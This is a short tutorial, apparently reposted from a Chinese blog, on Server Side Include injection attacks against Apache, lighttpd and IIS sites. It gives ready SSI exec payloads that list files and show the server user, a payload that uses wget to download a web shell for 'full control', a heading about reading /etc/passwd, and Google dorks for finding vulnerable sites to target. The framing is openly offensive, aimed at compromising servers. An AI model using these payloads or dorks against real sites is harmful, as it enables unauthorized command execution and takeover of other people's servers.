1- What is It?
 
A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.
 
2- What Sites are Vulnerable?
 
For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in ‘.shtml’ ‘.shtm’ or ‘.stm’ both Apache, lighthttpd and IIS support SSI.
 
3- Testing for SSI Injection
 
To audit a site to check if it is vulnerable to SSI Injection you search all the directories for ‘.shtml’ ‘.shtm’ or ‘.stm’ extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !–#exec …–>) To test you enter the following command into the request
 
< !–#exec cmd=”ls” –>
 
If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the ‘ls’ for ‘dir’
You test for SSI the same way as XSS, you can post the command into
- Textboxes/search boxes
- Headers
- Cookies
- Address Bar
 
4- Useful Commands
 
-Show Files Linux www.2cto.com
 
< !–#exec cmd=”ls” –>
 
-Show Files Windows
 
< !–#exec cmd=”dir” –>
 
-Read /etc/passwd
 
 
 
-What User Is the webserver running on
 
< !–#exec cmd=”whoami” –>
 
-Download a shell to the server to get full control
 
< !–#exec cmd=”wget “shell.php”” –>
 
5- Dorks
 
Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Theres a few to start you off, but it is easy as pie to think of your own.

摘自 http://hi.baidu.com/evilrapper/blog/item/743d884e13a465d4d0c86a76.html